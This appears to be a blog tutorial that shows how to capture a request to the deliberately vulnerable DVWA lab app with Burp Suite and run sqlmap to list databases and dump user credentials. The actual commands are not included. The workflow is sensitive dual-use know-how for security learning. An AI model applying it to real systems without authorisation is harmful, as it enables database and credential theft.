SQL Injection — Security
Learn! Learn! Learn!
Hello Everyone, hope you all are doing well during this pandemic situation.
Today, I bring an interesting topic that most of us listen in Security world.
NOTE: This is only for Education Purpose.
What is SQL Injection?
This is one the most web hacking techniques used to destroy your database and to hack useful information. Basically, we submit SQL like queries in the webpages.
To understand how it works, let’s get into the DEMO.
Pre-requisites.
1. Kali Linux ( You can select your own flavor Parrot OS, etc.).
2. Burp Suite (https://portswigger.net/burp) — “It’s a proxy based tool to identify and explore assess the vulnerability and perform hands-on testing.
3. DVWA (https://dvwa.co.uk/ — Damn Vulnerable Web Application (DVWA). “ This is a vulnerable application”.
Vulnerable application DVWA is running on port 8883
I have Burp Suite(Community edition) running and the default proxy is set to my local machine 127.0.0.1, port 8080.
IMPORTANT: Make sure to configure your proxy in IE/Firefox/Chrome.
Click on SQL Injection
I will type “admin”, so I can capture that information in the Burp suite. As soon as you enter Submit, you will notice the GET request is being captured in the suite.
Important to note here, remove user_token, and series of cookie as highlighted below.
Now, you query should like below:
Click on Action > Copy to file. Save the file as anything.. I’m saving it as “sql_injection.txt” for reference.
You have the file saved in Kali linux, note the location where you have stored the file.
I’m using sqlmap tool which parses the details mentioned in the txt file, run the below command as in on the terminal.
The tool was able to get Database name and the list of DBs that the application is connected to.
Now, let us find all the details with respect to the dvwa database. Run the below query.
You will see the list of user name and passwords of this application in a cool format.
Thank you everyone! Have a great day!
